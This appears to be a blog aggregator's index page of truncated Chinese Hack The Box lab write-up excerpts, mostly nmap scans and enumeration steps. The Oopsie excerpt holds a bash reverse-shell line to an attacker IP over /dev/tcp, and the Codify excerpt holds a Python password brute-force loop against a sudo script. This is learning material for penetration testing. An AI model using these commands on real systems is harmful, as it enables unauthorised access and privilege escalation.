HTB

HTB-CozyHosting

目标靶机的IP地址为10.10.11.230,下面测试连接的稳定性!攻击机的IP地址为10.10.14.67!有一点点慢,应该是问题不大!信息收集#nmap-sT--min-rate10000-p-10.10.11.230-oNport.nmapStartingNmap7.94(https://nmap.org)at2024-02-1517:36CSTWarning:10.10.11.230giv
Y4y17·2024-02-20 18:28

HTB-Analytics

靶机的IP地址为10.10.11.233,攻击机的IP地址为10.10.16.30信息收集#nmap-sT--min-rate10000-p-10.10.11.233-oNport.nmapStartingNmap7.94(https://nmap.org)at2024-02-1914:50CSTWarning:10.10.11.233givinguponportbecauseretransmis
Y4y17·2024-02-20 18:26

入坑 Hack The Box

目录介绍HackingTheBox(HTB)vsVulnHub注册使用1:直接连接windows连接htb1.下载安装OpenVPN2.获取VPN配置文件3.导入配置文件4.连接VPN5.验证可行性linux
lainwith·2024-02-09 17:46

Hackthebox Shoppy攻略

一、信息收集1、端口扫描发现两个端口:22、80;其中80端口扫描后发现其重定向至域名http://shoppy.htb我们将域名添加至/etc/hosts中,使kali可以解析。
bruce121385·2024-02-09 17:46

[原创]夺棋赛HackTheBox OpenSource攻略

简介HackTheBox(缩写HTB),HTB是一个网络安全攻防竞技场,全球的顶尖高手很多在上面,有人在上面出题(防守),就有人解题(攻击)。想提高网络攻防水平就来玩这个game平台。
huandaohack·2024-02-09 17:45

HTB Monitored

MonitoreduserNmap┌──(kali㉿kali)-[~]└─$nmap-A10.10.11.248StartingNmap7.80(https://nmap.org)at2024-01-1423:42CSTStats:0:00:15elapsed;0hostscompleted(1up),1undergoingConnectS
Som3B0dy·2024-02-08 00:19

HTB Pov

PovUserNmap┌──(kali㉿kali)-[~/freeAv]└─$nmap-A10.10.11.251StartingNm
Som3B0dy·2024-02-08 00:19

HTB Analysis

Analysisusernmap➜~nmap-A10.10.11.250StartingNmap7.80(https://nmap.org)at2024-01-2321:57CSTNmapscanreportforlocalhost(10.10.11.250)Hostisup(0.14slatency).Notshown:987closedportsPORTSTATESERVICEVERSION5
Som3B0dy·2024-02-08 00:17

HTB-AdmirerToo

第一步:nmap扫描nmap-Pn-sF-sV-sC-A10.10.11.137-Pn:不进行ping扫描-sF:探测防火墙状态-sV:探测开放端口以确定服务/版本信息-A:选项用于使用进攻性方式扫描-sC:使用-sC或-A选项拦描时候默认的脚本,提供基本脚本扫描能力看到端口80已打开,用dirsearch枚举web应用程序python3dirsearch.py-uhttp://10.10.11.
H0ne·2024-02-04 07:08

Hack The Box-Pov

nmap对主机进行端口扫描nmap10.10.11.251只开放了80端口访问网站后发现没有什么功能点,尝试目录扫描并没有什么能够利用的点使用gobuster进行子域名扫描gobusterdns-dpov.htb-w
0415i·2024-02-02 21:07

Hack The Box-Analysis

协议相关漏洞enum4linux-l10.10.11.250能扫描出域名为analysis,将域名加入到hosts文件中,并作为自定义DNS服务器后获取一些子域gobusterdns-danalysis.htb-w
0415i·2024-02-02 21:36

2021-02-23 HTB Laboratory Walkthrough

10.10.10.216信息搜集端口扫描nmap443端口扫描到两个网站,分别是https://laboratory.htbhttps://git.laboratory.htbhttps://laboratory.htb
ev3rrr·2024-01-28 03:55

Linux/Academy

Enumerationnmap首先扫描目标端口对外开放情况nmap-p-10.10.10.215-T4发现对外开放了22,80,33060三个端口,端口详细信息如下结果显示80端口运行着http,且给出了域名academy.htb
ve9etable·2024-01-26 02:56

Linux/Tabby

已知目标开放了22,80,8080端口,扫描详细情况如下TCP/80显示80和8080分别是Apache和Tomcat,而22是ssh,Apache页面如下页面上有些链接指向http://megahosting.htb
ve9etable·2024-01-26 02:55

Linux/Doctor

Enumerationnmap已知目标开放了22,80,8089端口,扫描详细情况如下可以看到对外开放了22,80,8089三个端口TCP/80SSTI访问80端口,有一个info@doctors.htb
ve9etable·2024-01-26 02:53

HTB】Horizontal(vhost爆破,chisel隧道)

免责声明本文渗透的主机经过合法授权。本文使用的工具和方法仅限学习交流使用,请不要将文中使用的工具和渗透思路用于任何非法用途,对此产生的一切后果,本人不承担任何责任,也不对造成的任何误用或损害负责。服务探测┌──(rootkali)-[~]└─#nmap-sV-Pn10.10.11.105Hostdiscoverydisabled(-Pn).Alladdresseswillbemarked'up'a
天线锅仔·2024-01-24 03:24

Hack The Box - TIER 0 - Meow Fawn Dancing

实战有点难,代码审计有师傅建议先别搞,那刷刷HTB也不错,多方好评。Meow看新手入门连接到HTB的靶机过后,就打开了第一个,好像前面不做也只能打开第一个。
Tajang·2024-01-22 08:00

htb(二)

Oopsieproxy发现不是这里可以看到有个login尝试发现是/cdn-cgi/login发现需要adminCookie将id修改为134322记得之前扫到的/uploads目录db.php/bin/bash-c'bash-i&>/dev/tcp/10.10.14.217/55550catchmod+xcataf13b0bee69f8a877c3faf667f7beacfVaccineftpa
wanan0red·2024-01-22 00:30

HTB Napper WriteUp

Napper2023年11月12日14:58:35UserNmap➜Nappernmap-sCV-A-p-10.10.11.240--min-rate10000StartingNmap
Som3B0dy·2024-01-22 00:30

htb Analysis wp

施工中StartingNmap7.94(https://nmap.org)at2024-01-2023:15ESTNmapscanreportfor10.129.7.235Hostisup(0.47slatency).PORTSTATESERVICEVERSION53/tcpopendomainSimpleDNSPlus80/tcpopenhttpMicrosoftHTTPAPIhttpd2.0(
春猿火·2024-01-22 00:56

[HTB][Sherlocks] Meerkat

作为一家快速发展的初创公司,Forela一直在利用商业管理平台。不幸的是,我们的文档很少,而且我们的管理员也不是最有安全意识的。作为我们的新安全提供商,我们希望您查看我们导出的一些PCAP和日志数据,以确认我们是否已经(或没有)被泄露。TASK1题目:我们认为我们的业务管理平台服务器已被破坏。请确认正在运行的应用程序的名称?打开分析,端点进行数据分析172为内网地址,根据题目意思,那么商业管理平台
Мартин.·2024-01-20 08:34

HTB-Sherlocks-OpTinselTrace-3 WP 应急响应-内存取证】

连接:HackTheBox文件下载解压后是一个内存文件santaclaus.bin,使用vol3去进行内存取证,因为该内存镜像是win10版本的1.Whatisthenameofthefilethatislikelycopiedfromthesharedfolder(includingthefileextension)?【可能从共享文件夹复制的文件的名称是什么(包括文件扩展名)?】使用命令vol.
Asymptote_tanaka·2024-01-20 08:29

【Sherlocks圣诞节特辑】htb OpTinselTrace-3 wp

TASK1Whatisthenameofthefilethatislikelycopiedfromthesharedfolder(includingthefileextension)?可能从共享文件夹复制的文件的名称是什么(包括文件扩展名)?TASK2Whatisthefilenameusedtotriggertheattack(includingthefileextension)?用于触发攻击的
春猿火·2024-01-19 23:53

【Sherlocks圣诞节特辑】htb OpTinselTrace-4 wp

TASK1Theperformanceofthenetworkprinterserverhasbecomesluggish,causinginterruptionsintheworkflowattheNorthPoleworkshop.Santahasdirectedustogenerateasupportrequestandexaminethenetworkdatatopinpointtheso
春猿火·2024-01-19 23:53

htb snoopy wp记录

这个破靶机难度不高但是也不低…考的东西蛮多,卡在主页太久了,收集完信息后一直太多时间浪费在fuzz首页的download接口,感谢hxd发现afr有路径过滤,要不这靶机彻底卡这了。惯例nmap扫一下无视22,看到开了53和80,看到53是起了dns的,话不多说直接把自己的dns指向他再接着看webng的1.18应该…这个靶机能用的上的漏洞我是真没找到1.首页有两个here看眼源码第一个对应http
春猿火·2024-01-19 23:52

【Sherlocks圣诞节特辑】htb OpTinselTrace-2 wp

圣诞系列5台的文件信息是复用的,这里先更一下OpTinselTrace-2,OpTinselTrace-1会这周内更新。task1WhatistheMD5sumofthebinarytheThreatActorfoundtheS3bucketlocationin?aws的bucket里的二进制程序md5task2WhattimedidtheThreatActorbegintheirautomate
春猿火·2024-01-19 23:52

htb monitorstwo wp记录

哼哼啊啊啊啊好久没打靶了身体不太gud,今儿久违的打一个直接开冲个上周的ez靶机上来梭哈nmap扫一扫└─$sudonmap-sS10.10.11.211-p--sC--min-rate=10000StartingNmap7.93(https://nmap.org)at2023-05-0804:02-0930Warning:10.10.11.211givinguponportbecauseretr
春猿火·2024-01-19 23:22

htb jupiter root简记 wp

简单说一下还是这个东西,直接执行会提示缺少配置文件搜下关键字看看有没有关联的这里出来个绝对路径的怀疑是他的目标配置写个json丢这,然后根据他的报错疯狂fuzz,报错缺什么就加什么然后我倒在了这里,他说有一组数组,但是没给变量名它既然能跑就肯定会有现成的config,于是搜了下软件名,在share下找到个目录如果没有这个config的话我就得直接拆包了重点是"tleroot":"/tmp/tle/
春猿火·2024-01-19 23:22

htb Sandworm wp

nmap有域名ssa.htb加到hosts看web爆dns和域名点到contact里面有个guide可以点点进去之后web如下从上往下依次是;测试解密密文测试公钥加密生成密文你的公钥信息和签名这边他会给你一个测试用的
春猿火·2024-01-19 23:22

htb codify root 脚本

?填充方式importsubprocessimportstringpd=[]s=string.printabledefreco(jp):re=subprocess.run(f'echo{jp}|sudo./aha.sh',shell=True,stdout=subprocess.PIPE,text=True)returnre.stdoutwhileTrue:rei=reco(''.join(pd)
春猿火·2024-01-19 23:22

htb monitored root方式其中的一种(仅作记录)

快下班时候审出来的,目前root的第5种方式nagios@monitored:~$cat/usr/local/nagiosxi/scripts/backup_xi.sh#!/bin/bash##CreatesaFullBackupofNagiosXI#Copyright(c)2011-2020NagiosEnterprises,LLC.Allrightsreserved.#BASEDIR=$(di
春猿火·2024-01-19 23:20

HTB】ServMon(目录遍历,chisel隧道,普通用户提权至管理员组)

服务探测┌──(rootkali)-[~/htb/ServMon]└─#nmap-sV-Pn10.10.10.184-p-Hostdiscoverydisabled(-Pn).Alladdresseswi
天线锅仔·2024-01-17 06:27

[渗透测试学习] Surveillance -HackTheBox

getshell提权信息搜集nmap扫描端口nmap-sV-sC-v-p---min-rate100010.10.11.245扫出来两个端口,其中80端口有http服务并且重定向到surveillance.htb
_rev1ve·2024-01-14 23:52

Linux/Frolic

Enumerationnmap还是扫描系统对外开放的端口情况,对外开放了22,139,445,还有9999端口,显示是http服务,使用了nginx1.10.3┌──(kali㉿kali)-[~/HTB
ve9etable·2024-01-14 11:39

HTB - PC

靶机描述ip:10.10.11.214在做之前需要配置一下hosts文件,不然会连接失败(windows的hosts文件在C:\Windows\System32\drivers\etc里,linux在/etc/hosts)信息收集nmap扫描开启了22端口ssh服务和50051端口单独在仔细扫一遍50051端口继续搜集信息,搜索了一下50051是什么服务发现50051是gRPC的默认端口继续搜索怎
怪兽不会rap_哥哥我会crash·2024-01-14 10:44

HTB靶场-Sau

本人自己的打靶记录,会有错误的地方,尽情谅解,欢迎指出错误和不解的地方,让我们共同进步!信息收集端口扫描nmap-sV10.10.11.22422,80,55555端口开放,80端口访问不了,但是55555端口有web服务通过页面显示RequestBaskets1.2.1版本RequestBaskets是rbaskets开源的一个Web服务搜索发现有一个SSRF漏洞(CVE-2023-27163)
hang0c·2024-01-14 10:44

HTB-sau Walkthrough

原文:个人主页原文运行环境:macOS13.2.1;ParallelDesktop:KaliLinux2022.2ARM64;Windows11靶机链接:https://app.hackthebox.com/machines/Sau过程信息收集基础的四项扫描:在端口扫描时,采用默认的-sS方式,能够扫到-sT方式扫不到的80和8338端口:扫描完成后,进行子目录爆破:Web部分进入hostname
yunsaijc·2024-01-14 10:43

HTB Sau Maltraill-v0.53 CVE-2021-3560

htb|sau使用nmap扫描端口nmap-sV-sC-v-oNSau10.10.11.224#Nmap7.93scaninitiatedMonDec2508:56:252023as:nmap-sV-sC-v-oNSau10.10.11.224Nmapscanreportfor10.10.11.224Hostisup
强少张·2024-01-14 10:12

HTB PC

HTBPC链接:https://qing3feng.github.io/2023/05/29/HTB%20PC/今天又学一招,配置好/etc/hosts文件:[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传如图所示
清风--·2024-01-14 10:12

HTB靶场系列 linux靶机 Tartarsause靶机

勘探nmap直接扫root@kali:~/hackthebox/tartarsauce-10.10.10.88#nmap10.10.10.88StartingNmap7.70(https://nmap.org)at2018-05-2212:21EDTWarning:10.10.10.88givinguponportbecauseretransmissioncaphit(10).Nmapscanre
万天峰·2024-01-14 10:12

HTB-SAU

信息收集#catport.nmap#Nmap7.94scaninitiatedThuJan1119:26:512024as:nmap-sS--min-rate10000-p--oNport.nmap10.10.11.224Nmapscanreportfor10.10.11.224(10.10.11.224)Hostisup(0.28slatency).Notshown:65531closedtcp
YAy17·2024-01-14 10:08

HackTheBox-Keeper

10.10.11.227开放端口为22和80端口服务版本和操作系统信息探测:nmap-sV-sC-O-p22,8010.10.11.227Nmapscanreportfortickets.keeper.htb
YAy17·2024-01-13 01:11

HTB靶机:RainyDay

目录介绍主机信息探测网站探测子域名爆破(BurpSuite)目录爆破爆破参数值分析&破解hash登录系统反弹shell端口转发内网穿透【很坑】配置socks代理内网扫描换用windows做内网渗透子域名信息收集爆破密钥位置爆破密钥内容JWT攻击进程监控Flag1&获取SSH私钥提权python沙盒逃逸&提权为jack_adm破解hash参考介绍系统:linux难度:困难发布日期:2022/10/1
lainwith·2024-01-07 19:28

linux htb 源代码,LINUX TC:HTB相关源码

LINUXTC:HTB相关源码收藏HTB(hierarchytokenbuffer)是linuxtc(trafficcontrol)模块中的排队队列的一种。
白条说再来一碗·2024-01-07 19:57

HTB WP】Archetype

前言Hackthebox-ArchetypeWP原文用onenote写的,懒得搬运了,凑合看吧这几天试了一下HTB,感觉挺好玩的,属于是kail熟悉练习了
Pz_mstr·2024-01-07 19:26

分类流控qdisc之htb

文章目录tc参数配置示例算法思想用户态实现数据结构htb全局配置参数:tc_htb_globhtb类配置参数:tc_htb_optqdisc配置参数解析:htb_parse_opt()class配置参数解析
fanxiaoyu321·2024-01-07 19:55

HTB Bizness

Bizness2024年1月7日10:16:41UserNmapNotshown:997closedportsPORTSTATESERVICEVERSION22/tcpopensshOpenSSH8.4p1Debian5+deb11u3(protocol2.0)80/tcpopenhttpnginx1.18.0|_http-server-header:nginx/1.18.0|_http-titl
Som3B0dy·2024-01-07 19:54

【Hack The Box】Linux练习-- Seventeen

HTB学习笔记【HackTheBox】Linux练习--Seventeen系列专栏:HackTheBox欢迎关注点赞收藏⭐️留言首发时间:2022年9月7日作者水平很有限,如果发现错误,还望告知,感谢!
人间体佐菲·2024-01-02 21:14

【Hack The Box】windows练习-- love

HTB学习笔记【HackTheBox】windows练习--love系列专栏:HackTheBox欢迎关注点赞收藏⭐️留言首发时间:2022年9月7日作者水平很有限,如果发现错误,还望告知,感谢!
人间体佐菲·2024-01-02 21:44

HackTheBox - Medium - Linux - Encoding

我想我就没有必要了,我想在2023这一年里我的博客内容就是最棒的总结和结果.昨天是我没有打htb靶机并且写wp的一天,昨晚也是2023年最后一个夜晚,我们TryHackMyO
Sugobet·2024-01-02 21:42
上一页 1 2 3 4 5 6 7 8 下一页
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他